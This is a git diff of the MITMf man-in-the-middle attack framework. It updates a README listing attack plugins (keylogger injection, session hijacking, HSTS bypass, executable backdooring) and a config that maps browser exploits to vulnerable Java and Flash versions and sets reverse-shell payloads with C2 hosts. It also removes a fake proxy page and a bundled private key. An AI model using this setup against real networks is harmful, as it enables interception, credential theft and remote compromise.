diff --git a/.gitmodules b/.gitmodules
index ca49b01..65a6dc5 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -1,12 +1,3 @@
[submodule "libs/bdfactory"]
path = libs/bdfactory
url = https://github.com/secretsquirrel/the-backdoor-factory
-[submodule "libs/responder"]
- path = libs/responder
- url = https://github.com/byt3bl33d3r/Responder-MITMf
-[submodule "core/beefapi"]
- path = core/beefapi
- url = https://github.com/byt3bl33d3r/beefapi
-[submodule "libs/dnschef"]
- path = libs/dnschef
- url = https://github.com/byt3bl33d3r/dnschef
diff --git a/README.md b/README.md
index 913c640..7b03c09 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-MITMf V0.9.6
+MITMf V0.9.7
============
Framework for Man-In-The-Middle attacks
@@ -7,61 +7,57 @@ Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
-**Before submitting issues please read the appropriate [section](#submitting-issues).**
+Contact me at:
+- Twitter: @byt3bl33d3r
+- IRC on Freenode: #MITMf
+- Email: byt3bl33d3r@gmail.com
-(Another) Dependency change!
-============================
-As of v0.9.6, the fork of the ```python-netfilterqueue``` library is no longer required.
+**Before submitting issues please read the [FAQ](#faq) and the appropriate [section](#submitting-issues).**
-Installation
-============
-If MITMf is not in your distros repo or you just want the latest version:
-- clone this repository
-- run the ```setup.sh``` script
-- run the command ```pip install -r requirements.txt``` to install all python dependencies
-
-On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pypcap``` to fix it.
-
-Availible plugins
+Available plugins
=================
-- Responder - LLMNR, NBT-NS and MDNS poisoner
-- SSLstrip+ - Partially bypass HSTS
-- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
-- Sniffer - Sniffs for various protocol login and auth attempts
-- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
-- AppCachePoison - Perform app cache poison attacks
-- SessionHijacking - Performs session hijacking attacks, and stores cookies in a firefox profile
-- BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
-- CacheKill - Kills page caching by modifying headers
-- FilePwn - Backdoor executables being sent over http using bdfactory
-- Inject - Inject arbitrary content into HTML content
-- JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins
-- jskeylogger - Injects a javascript keylogger into clients webpages
-- Replace - Replace arbitary content in HTML content
-- SMBAuth - Evoke SMB challenge-response auth attempts
-- Upsidedownternet - Flips images 180 degrees
+- ```Screenshotter``` - Uses HTML5 Canvas to render an accurate screenshot of a client's browser
+- ```Responder``` - LLMNR, NBT-NS, WPAD and MDNS poisoner
+- ```SSLstrip+``` - Partially bypasses HSTS
+- ```Spoof``` - Redirects traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing
+- ```BeEFAutorun``` - Autoruns BeEF modules based on a client's OS or browser type
+- ```AppCachePoison``` - Performs app cache poisoning attacks
+- ```Ferret-NG``` - Transparently hijacks sessions
+- ```BrowserProfiler``` - Attempts to enumerate all browser plugins of connected clients
+- ```CacheKill``` - Kills page caching by modifying headers
+- ```FilePwn``` - Backdoors executables sent over HTTP using the Backdoor Factory and BDFProxy
+- ```Inject``` - Injects arbitrary content into HTML content
+- ```BrowserPwn``` - Performs drive-by attacks on clients with out-of-date browser plugins
+- ```jskeylogger``` - Injects a JavaScript keylogger into a client's webpages
+- ```Replace``` - Replaces arbitrary content in HTML content
+- ```SMBAuth``` - Evokes SMB challenge-response auth attempts
+- ```Upsidedownternet``` - Flips images 180 degrees
Changelog
=========
+- ```SessionHijacker``` has been replaced with ```Ferret-NG```, which captures cookies and starts a proxy that feeds them to connected clients
+
+- Addition of the ```Screenshotter``` plugin, able to render screenshots of a client's browser at regular intervals
+
+- Addition of a fully functional SMB server using the [Impacket](https://github.com/CoreSecurity/impacket) library
+
- Addition of [DNSChef](https://github.com/iphelix/dnschef), the framework is now a IPv4/IPv6 (TCP & UDP) DNS server ! Supported queries are: 'A', 'AAAA', 'MX', 'PTR', 'NS', 'CNAME', 'TXT', 'SOA', 'NAPTR', 'SRV', 'DNSKEY' and 'RRSIG'
-- Addition of the Sniffer plugin which integrates [Net-Creds](https://github.com/DanMcInerney/net-creds) currently supported protocols are:
+- Integrated [Net-Creds](https://github.com/DanMcInerney/net-creds); currently supported protocols are:
FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc..) and Kerberos
- Integrated [Responder](https://github.com/SpiderLabs/Responder) to poison LLMNR, NBT-NS and MDNS, and act as a WPAD rogue server.
- Integrated [SSLstrip+](https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014
-- Addition of the SessionHijacking plugin, which uses code from [FireLamb](https://github.com/sensepost/mana/tree/master/firelamb) to store cookies in a Firefox profile
+- ```Spoof``` plugin can now exploit the 'ShellShock' bug when DHCP spoofing!
-- Spoof plugin can now exploit the 'ShellShock' bug when DHCP spoofing!
-
-- Spoof plugin now supports ICMP, ARP and DHCP spoofing
+- ```Spoof``` plugin now supports ICMP, ARP and DHCP spoofing
- Usage of third party tools has been completely removed (e.g. ettercap)
-- FilePwn plugin re-written to backdoor executables and zip files on the fly by using [the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) and code from [BDFProxy](https://github.com/secretsquirrel/BDFProxy)
+- ```FilePwn``` plugin rewritten to backdoor executables, zip and tar files on the fly by using [the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) and code from [BDFProxy](https://github.com/secretsquirrel/BDFProxy)
- Added [msfrpc.py](https://github.com/byt3bl33d3r/msfrpc/blob/master/python-msfrpc/msfrpc.py) for interfacing with Metasploits rpc server
@@ -69,18 +65,52 @@ Changelog
- Addition of the app-cache poisoning attack by [Krzysztof Kotowicz](https://github.com/koto/sslstrip) (blogpost explaining the attack here http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html)
-Submitting Issues
-=================
-If you have *questions* regarding the framework please email me at byt3bl33d3r@gmail.com
-
-If you find a *bug* please open an issue and include at least the following in the description:
-
-- Full command string you used
-- OS your using
-
-Also remember: Github markdown is your friend!
-
How to install on Kali
======================
```apt-get install mitmf```
+
+**Currently Kali has a very old version of MITMf in its repos; read the [Installation](#installation) section to get the latest version**
+
+Installation
+============
+If MITMf is not in your distro's repos or you just want the latest version:
+- Clone this repository
+- Run the ```setup.sh``` script
+- Run the command ```pip install -r requirements.txt``` to install all python dependencies
+
+On Kali Linux, if you get an error while installing the ```pypcap``` package, or if starting MITMf gives you ```ImportError: no module named pcap```, run ```apt-get install python-pypcap``` to fix it.
+
+Submitting Issues
+=================
+If you have *questions* regarding the framework please email me at byt3bl33d3r@gmail.com
+
+**Only submit issues if you find a bug in the latest version of the framework.**
+
+When you inevitably do come across a *bug*, please open an issue and include at least the following in the description:
+
+- Full command string you used
+- OS you're using
+- Full error traceback (if any)
+
+Also remember: GitHub markdown is your friend!
+
+FAQ
+===
+- **Is Windows supported?**
+- No
+
+- **Is OSX supported?**
+- Currently no, although with some tweaking (which I'll probably get around to in the near future) it should be able to run perfectly on OSX
+
+- **I can't install package X because of an error!**
+- Try installing the package via ```pip``` or your distro's package manager. This *isn't* a problem with MITMf.
+
+- **How do I install package X?**
+- Please read the [installation](#installation) guide.
+
+- **I get an ImportError when launching MITMf!**
+- Please read the [installation](#installation) guide.
+
+- **Dude, no documentation/video tutorials?**
+- Currently no, once the framework hits 1.0 I'll probably start writing/making some.
diff --git a/config/mitmf.conf b/config/mitmf.conf
index f1f5b32..c6a4269 100644
--- a/config/mitmf.conf
+++ b/config/mitmf.conf
@@ -18,9 +18,19 @@
pass = beef
[[Metasploit]]
- msfport = 8080 #Port to start webserver for exploits
+
+ msfport = 8080 #Port to start Metasploit's web server on (this will host the exploits)
rpcip = 127.0.0.1
rpcpass = abc123
+
+ [[SMB]]
+
+ #
+ #Here you can configure MITMf's internal SMB server
+ #
+
+ #Set a custom challenge
+ Challenge = 1122334455667788
[[DNS]]
@@ -28,7 +38,6 @@
#Here you can configure MITMf's internal DNS server
#
- resolver = dnschef #Can be set to 'twisted' or 'dnschef' ('dnschef' is highly reccomended)
tcp = Off #Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!)
port = 53 #Port to listen on
ipv6 = Off #Run in IPv6 mode (not fully tested, might break stuff!)
@@ -40,7 +49,7 @@
nameservers = 8.8.8.8
[[[A]]] # Queries for IPv4 address records
- *.thesprawl.org=192.0.2.1
+ *.thesprawls.org=192.0.2.1
[[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
@@ -86,62 +95,63 @@
subnet = 255.255.255.0
dns_server = 192.168.2.20 #optional
+[Replace]
+
+ [[Regex1]]
+ 'Google Search' = 'Google In My Pants'
+
+ [[Regex2]]
+ "I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
+
+[Ferret-NG]
+ #
+ # Here you can specify the client to hijack sessions from
+ #
+
+ Client = '192.168.20.126'
+
+[SSLstrip+]
+
+ #
+ #Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
+ #
+
+ #for google and gmail
+ accounts.google.com = account.google.com
+ mail.google.com = gmail.google.com
+ accounts.google.se = cuentas.google.se
+
+ #for facebook
+ www.facebook.com = social.facebook.com
+
[Responder]
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
- SQL = On
- SMB = On
+ MSSQL = On
Kerberos = On
- FTP = On
- POP = On
- ##Listen on 25/TCP, 587/TCP
- SMTP = On
- IMAP = On
- HTTP = On
- HTTPS = On
- LDAP = On
+ FTP = On
+ POP = On
+ SMTP = On #Listens on 25/TCP, 587/TCP
+ IMAP = On
+ LDAP = On
- #Set a custom challenge
- Challenge = 1122334455667788
-
- #Set this to change the default logging file
- SessionLog = Responder-Session.log
-
- #Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
- #RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
+ #Set this option with your in-scope targets (default = All)
+ #Ex. RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
RespondTo =
- #Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
- #RespondTo = WPAD,DEV,PROD,SQLINT
+
+ #Set this option with specific NBT-NS/LLMNR names to answer to (default = All)
+ #Ex. RespondTo = WPAD,DEV,PROD,SQLINT
RespondToName =
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
DontRespondTo =
- #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
+
+ #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None)
+ #Ex. DontRespondTo = NAC, IPS, IDS
DontRespondToName =
- [[HTTP Server]]
-
- #Set this to On if you want to always serve a specific file to the victim.
- Serve-Always = Off
-
- #Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
- Serve-Exe = Off
-
- #Uncomment and specify a custom file to serve, the file must exist.
- Filename = config/responder/Denied.html
-
- #Specify a custom executable file to serve, the file must exist.
- ExecFilename = config/responder/FixInternet.exe
-
- #Set your custom PAC script
- WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
-
- [[HTTPS Server]]
-
- #Change to use your certs
- cert = config/responder/certs/responder.crt
- key = config/responder/certs/responder.key
-
+ #Set your custom PAC script
+ WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
[BeEFAutorun]
#Example config for the BeefAutorun plugin
@@ -243,51 +253,90 @@
skip_in_mass_poison=1
#you can add other scripts in additional sections like jQuery etc.
-[JavaPwn]
+[BrowserSniper]
+ #
+ # Currently only supports java, flash and browser exploits
+ #
+ # The version strings were pulled from http://www.cvedetails.com
+ #
+ # When adding java exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
+ #
- #
- # All versions strings without a * are considered vulnerable if clients Java version is <= update version
- # When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
- #
+ [[multi/browser/java_rhino]] #Exploit's MSF path
+
+ Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
+ OS = Any #Can be set to Any, Windows or Windows + version (e.g Windows 8.1)
- [[Multi]] #Cross platform exploits, yay java! <3
+ Browser = Any #Can be set to Any, Chrome, Firefox, IE or browser + version (e.g IE 6)
+ Plugin = Java #Can be set to Java, Flash (if Type is BrowserVuln will be ignored)
- multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
- multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
- multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
- multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
- multi/browser/java_jre17_exec = 1.7.0.6
- multi/browser/java_jre17_jaxws = 1.7.0.7
- multi/browser/java_jre17_jmxbean = 1.7.0.10
- multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
- multi/browser/java_jre17_reflection_types = 1.7.0.17
- multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
- multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
- multi/browser/java_jre17_method_handle = 1.7.0.7
- multi/browser/java_jre17_driver_manager = 1.7.0.17
- multi/browser/java_jre17_provider_skeleton = 1.7.0.21
- multi/browser/java_storeimagearray = 1.7.0.21
- multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
+ #An exact list of the plugin versions affected (if Type is BrowserVuln will be ignored)
+ PluginVersions = 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.23, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.3, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0
- [[Windows]] #These are windows specific
+ [[multi/browser/java_atomicreferencearray]]
- windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
- windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
- windows/browser/java_mixer_sequencer = 1.6.0.18
+ Type = PluginVuln
+ OS = Any
+ Browser = Any
+ Plugin = Java
+ PluginVersions = 1.5.0, 1.5.0.1, 1.5.0.10, 1.5.0.11, 1.5.0.12, 1.5.0.13, 1.5.0.14, 1.5.0.15, 1.5.0.16, 1.5.0.17, 1.5.0.18, 1.5.0.19, 1.5.0.2, 1.5.0.20, 1.5.0.21, 1.5.0.22, 1.5.0.23, 1.5.0.24, 1.5.0.25, 1.5.0.26, 1.5.0.27, 1.5.0.28, 1.5.0.29, 1.5.0.3, 1.5.0.31, 1.5.0.33, 1.5.0.4, 1.5.0.5, 1.5.0.6, 1.5.0.7, 1.5.0.8, 1.5.0.9, 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.29, 1.6.0.3, 1.6.0.30, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0, 1.7.0.1, 1.7.0.2
-[SSLstrip+]
+ [[multi/browser/java_jre17_jmxbean_2]]
+
+ Type = PluginVuln
+ OS = Any
+ Browser = Any
+ Plugin = Java
+ PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
- #
- #Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
- #
+ [[multi/browser/java_jre17_reflection_types]]
- #for google and gmail
- accounts.google.com = account.google.com
- mail.google.com = gmail.google.com
- accounts.google.se = cuentas.google.se
+ Type = PluginVuln
+ OS = Any
+ Browser = Any
+ Plugin = Java
+ PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
+
+ [[multi/browser/java_verifier_field_access]]
- #for facebook
- www.facebook.com = social.facebook.com
+ Type = PluginVuln
+ OS = Any
+ Browser = Any
+ Plugin = Java
+ PluginVersions = 1.4.2.37, 1.5.0.35, 1.6.0.32, 1.7.0.4
+
+ [[multi/browser/java_jre17_provider_skeleton]]
+
+ Type = PluginVuln
+ OS = Any
+ Browser = Any
+ Plugin = Java
+ PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.21, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
+
+
+ [[exploit/windows/browser/adobe_flash_pcre]]
+
+ Type = PluginVuln
+ OS = Windows
+ Browser = Any
+ Plugin = Flash
+ PluginVersions = 11.2.202.440, 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296
+
+ [[exploit/windows/browser/adobe_flash_net_connection_confusion]]
+
+ Type = PluginVuln
+ OS = Windows
+ Browser = Any
+ Plugin = Flash
+ PluginVersions = 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 16.0.0.305
+
+ [[exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array]]
+
+ Type = PluginVuln
+ OS = Windows
+ Browser = Any
+ Plugin = Flash
+ PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144
[FilePwn]
@@ -327,91 +376,93 @@
# Tested on Kali-Linux.
[[ZIP]]
- # patchCount is the max number of files to patch in a zip file
- # After the max is reached it will bypass the rest of the files
- # and send on it's way
+ # patchCount is the max number of files to patch in a zip file
+ # After the max is reached it will bypass the rest of the files
+ # and send them on their way
- patchCount = 5
+ patchCount = 5
- # In Bytes
- maxSize = 40000000
+ # In Bytes
+ maxSize = 40000000
- blacklist = .dll, #don't do dlls in a zip file
+ blacklist = .dll, #don't do dlls in a zip file
[[TAR]]
- # patchCount is the max number of files to patch in a tar file
- # After the max is reached it will bypass the rest of the files
- # and send on it's way
+ # patchCount is the max number of files to patch in a tar file
+ # After the max is reached it will bypass the rest of the files
+ # and send them on their way
- patchCount = 5
+ patchCount = 5
- # In Bytes
- maxSize = 40000000
+ # In Bytes
+ maxSize = 40000000
- blacklist = , # a comma is null do not leave blank
+ blacklist = , # a comma is null; do not leave this blank
[[targets]]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
-
- LinuxType = ALL # choices: x86/x64/ALL/None
- WindowsType = ALL # choices: x86/x64/ALL/None
- FatPriority = x64 # choices: x86 or x64
-
- FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
- CompressedFiles = True #True/False
+ LinuxType = ALL # choices: x86/x64/ALL/None
+ WindowsType = ALL # choices: x86/x64/ALL/None
+ FatPriority = x64 # choices: x86 or x64
- [[[[LinuxIntelx86]]]]
- SHELL = reverse_shell_tcp # This is the BDF syntax
- HOST = 192.168.1.168 # The C2
- PORT = 8888
- SUPPLIED_SHELLCODE = None
- MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
-
- [[[[LinuxIntelx64]]]]
- SHELL = reverse_shell_tcp
- HOST = 192.168.1.16
- PORT = 9999
- SUPPLIED_SHELLCODE = None
- MSFPAYLOAD = linux/x64/shell_reverse_tcp
+ FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
- [[[[WindowsIntelx86]]]]
- PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
- # PATCH_METHOD overwrites PATCH_TYPE with jump
- PATCH_METHOD = automatic
- HOST = 192.168.1.16
- PORT = 8443
- SHELL = iat_reverse_tcp_stager_threaded
- SUPPLIED_SHELLCODE = None
- ZERO_CERT = False
- PATCH_DLL = True
- MSFPAYLOAD = windows/meterpreter/reverse_tcp
+ CompressedFiles = True #True/False
+
+ [[[[LinuxIntelx86]]]]
+ SHELL = reverse_shell_tcp # This is the BDF syntax
+ HOST = 192.168.1.168 # The C2
+ PORT = 8888
+ SUPPLIED_SHELLCODE = None
+ MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
+
+ [[[[LinuxIntelx64]]]]
+ SHELL = reverse_shell_tcp
+ HOST = 192.168.1.16
+ PORT = 9999
+ SUPPLIED_SHELLCODE = None
+ MSFPAYLOAD = linux/x64/shell_reverse_tcp
- [[[[WindowsIntelx64]]]]
- PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
- # PATCH_METHOD overwrites PATCH_TYPE with jump
- PATCH_METHOD = automatic
- HOST = 192.168.1.16
- PORT = 8088
- SHELL = iat_reverse_tcp_stager_threaded
- SUPPLIED_SHELLCODE = None
- ZERO_CERT = True
- PATCH_DLL = False
- MSFPAYLOAD = windows/x64/shell_reverse_tcp
+ [[[[WindowsIntelx86]]]]
+ PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+ # PATCH_METHOD overwrites PATCH_TYPE with jump
+ # PATCH_METHOD = automatic
+ PATCH_METHOD =
+ HOST = 192.168.1.16
+ PORT = 8443
+ SHELL = iat_reverse_tcp_stager_threaded
+ SUPPLIED_SHELLCODE = None
+ ZERO_CERT = True
+ PATCH_DLL = False
+ MSFPAYLOAD = windows/meterpreter/reverse_tcp
- [[[[MachoIntelx86]]]]
- SHELL = reverse_shell_tcp
- HOST = 192.168.1.16
- PORT = 4444
- SUPPLIED_SHELLCODE = None
- MSFPAYLOAD = linux/x64/shell_reverse_tcp
+ [[[[WindowsIntelx64]]]]
+ PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+ # PATCH_METHOD overwrites PATCH_TYPE with jump
+ # PATCH_METHOD = automatic
+ PATCH_METHOD =
+ HOST = 192.168.1.16
+ PORT = 8088
+ SHELL = iat_reverse_tcp_stager_threaded
+ SUPPLIED_SHELLCODE = None
+ ZERO_CERT = True
+ PATCH_DLL = False
+ MSFPAYLOAD = windows/x64/shell/reverse_tcp
- [[[[MachoIntelx64]]]]
- SHELL = reverse_shell_tcp
- HOST = 192.168.1.16
- PORT = 5555
- SUPPLIED_SHELLCODE = None
- MSFPAYLOAD = linux/x64/shell_reverse_tcp
\ No newline at end of file
+ [[[[MachoIntelx86]]]]
+ SHELL = reverse_shell_tcp
+ HOST = 192.168.1.16
+ PORT = 4444
+ SUPPLIED_SHELLCODE = None
+ MSFPAYLOAD = linux/x64/shell_reverse_tcp
+
+ [[[[MachoIntelx64]]]]
+ SHELL = reverse_shell_tcp
+ HOST = 192.168.1.16
+ PORT = 5555
+ SUPPLIED_SHELLCODE = None
+ MSFPAYLOAD = linux/x64/shell_reverse_tcp
diff --git a/config/responder/Denied.html b/config/responder/Denied.html
deleted file mode 100644
index d79f811..0000000
--- a/config/responder/Denied.html
+++ /dev/null
@@ -1,31 +0,0 @@
-
-
-Website Blocked: ISA Proxy Server
-
-
-
-
-
-
-
New Security Policy: Website Blocked
-
-
-
-
Access has been blocked. Please download and install the new Proxy Client in order to access internet resources.
-
-
-
-
-
-
-
-
diff --git a/config/responder/FixInternet.exe b/config/responder/FixInternet.exe
deleted file mode 100755
index b1a8e63..0000000
Binary files a/config/responder/FixInternet.exe and /dev/null differ
diff --git a/config/responder/certs/gen-self-signed-cert.sh b/config/responder/certs/gen-self-signed-cert.sh
deleted file mode 100755
index e9f3c73..0000000
--- a/config/responder/certs/gen-self-signed-cert.sh
+++ /dev/null
@@ -1,2 +0,0 @@
-#!/bin/bash
-openssl genrsa -des3 -out responder.tmp.key 2048&&openssl rsa -in responder.tmp.key -out responder.key&&openssl req -new -key responder.key -out responder.csr&&openssl x509 -req -days 365 -in responder.csr -signkey responder.key -out responder.crt&&rm responder.tmp.key responder.csr
diff --git a/config/responder/certs/responder.crt b/config/responder/certs/responder.crt
deleted file mode 100644
index ac239e8..0000000
--- a/config/responder/certs/responder.crt
+++ /dev/null
@@ -1,19 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQDDe8Sb2PGjITANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTEzMDIyODIwMTcxN1oXDTE0MDIyODIwMTcxN1owRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-AMQB5yErm0Sg7sRQbLgbi/hG/8uF2xUzvVKnT4LROEWkkimy9umb2JbvAZITDvSs
-r2xsPA4VoxFjKpWLOv7mAIMBR95NDWsTLuR36Sho/U2LlTlUBdSfQP7rlKQZ0L43
-YpXswdvCCJ0wP2yOhq0i71cg/Nk9mfQxftpgGUxoa+6ljU9hSdmThu2FVgAbSpNl
-D86rk4K9/sGYAY4btMqaMzC7JIKZp07FHL32oM01cKbRoNg2eUuQmoVjca1pkmbO
-Y8qnl7ajOjsiAPQnt/2TMJlRsdoU1fSx76Grgkm8D4gX/pBUqELdpvHtnm/9imPl
-qNGL5LaW8ARgG16U0mRhutkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAS7u4LWc9
-wDPThD0o58Ti2GgIs+mMRx5hPaxWHJNCu+lwFqjvWmsNFfHoSzlIkIUjtlV2G/wE
-FxDSPlc/V+r7U2UiE7WSqQiWdmfOYS2m03x4SN0Vzf/n9DeApyPo2GsXGrha20eN
-s390Xwj6yKFdprUPJ8ezlEVRrAMv7tu1cOLzqmkocYKnPgXDdQxiiGisp7/hEUCQ
-B7HvNCMPbOi+M7O/CXbfgnTD029KkyiR2LEtj4QC5Ytp/pj0UyyoIeCK57CTB3Jt
-X3CZ+DiphTpOca4iENH55m6atk+WHYwg3ClYiONQDdIgKVT3BK0ITjyFWZeTneVu
-1eVgF/UkX9fqJg==
------END CERTIFICATE-----
diff --git a/config/responder/certs/responder.key b/config/responder/certs/responder.key
deleted file mode 100644
index 2b7cbc0..0000000
--- a/config/responder/certs/responder.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEowIBAAKCAQEAxAHnISubRKDuxFBsuBuL+Eb/y4XbFTO9UqdPgtE4RaSSKbL2
-6ZvYlu8BkhMO9KyvbGw8DhWjEWMqlYs6/uYAgwFH3k0NaxMu5HfpKGj9TYuVOVQF
-1J9A/uuUpBnQvjdilezB28IInTA/bI6GrSLvVyD82T2Z9DF+2mAZTGhr7qWNT2FJ
-2ZOG7YVWABtKk2UPzquTgr3+wZgBjhu0ypozMLskgpmnTsUcvfagzTVwptGg2DZ5
-S5CahWNxrWmSZs5jyqeXtqM6OyIA9Ce3/ZMwmVGx2hTV9LHvoauCSbwPiBf+kFSo
-Qt2m8e2eb/2KY+Wo0YvktpbwBGAbXpTSZGG62QIDAQABAoIBABbuLg74XgLKXQSE
-cCOdvWM/Ux+JOlchpW1s+2VPeqjTFvJf6Hjt7YnCzkk7h41iQmeJxgDT0S7wjgPO
-tQkq+TZaSQEdvIshRGQgDxvWJIQU51E8ni4Ar4bjIpGMH5qROixV9VvzODTDdzgI
